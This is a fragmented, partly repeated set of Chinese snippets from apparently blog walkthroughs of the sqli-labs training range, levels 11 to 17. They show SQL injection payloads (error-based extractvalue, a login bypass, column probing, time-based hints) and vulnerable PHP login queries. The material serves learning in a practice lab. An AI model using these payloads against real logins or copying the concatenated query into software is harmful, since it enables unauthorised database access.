admin") union select extractvalue(1,concat(0x7e,(select user()),0x7e)),1# (13)第十三关: 同理,13关的也是仅仅是变了个'): //connectivity@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";$result=mysql_query($sql);$row=mysql...
sqli-labs靶场11-17关 写的可能不太详细,详细请看https://www.cnblogs.com/-qing-/p/11610385.html#_lab2_0_0 友情提醒:发送数据请求不要乱加空格,否则结果可能显示不出来 十一关 uname=admin' order by 2#&passwd=1&submit=Submit //判断列数 uname=admin'or'3'='3'#&passwd=1&submit=Submit uname...
第15关一样的,就是闭合语句的问题,这一关居然没报错了,那就试试延时注入: //connectivity@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";$result=mysql_query($sql);$row=mysql_fetch_array($result); 1. 2. 3. 4. admin' union select e...
admin") union select extractvalue(1,concat(0x7e,(select user()),0x7e)),1# (13)第十三关: 同理,13关的也是仅仅是变了个'): //connectivity@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";$result=mysql_query($sql);$row=mysql...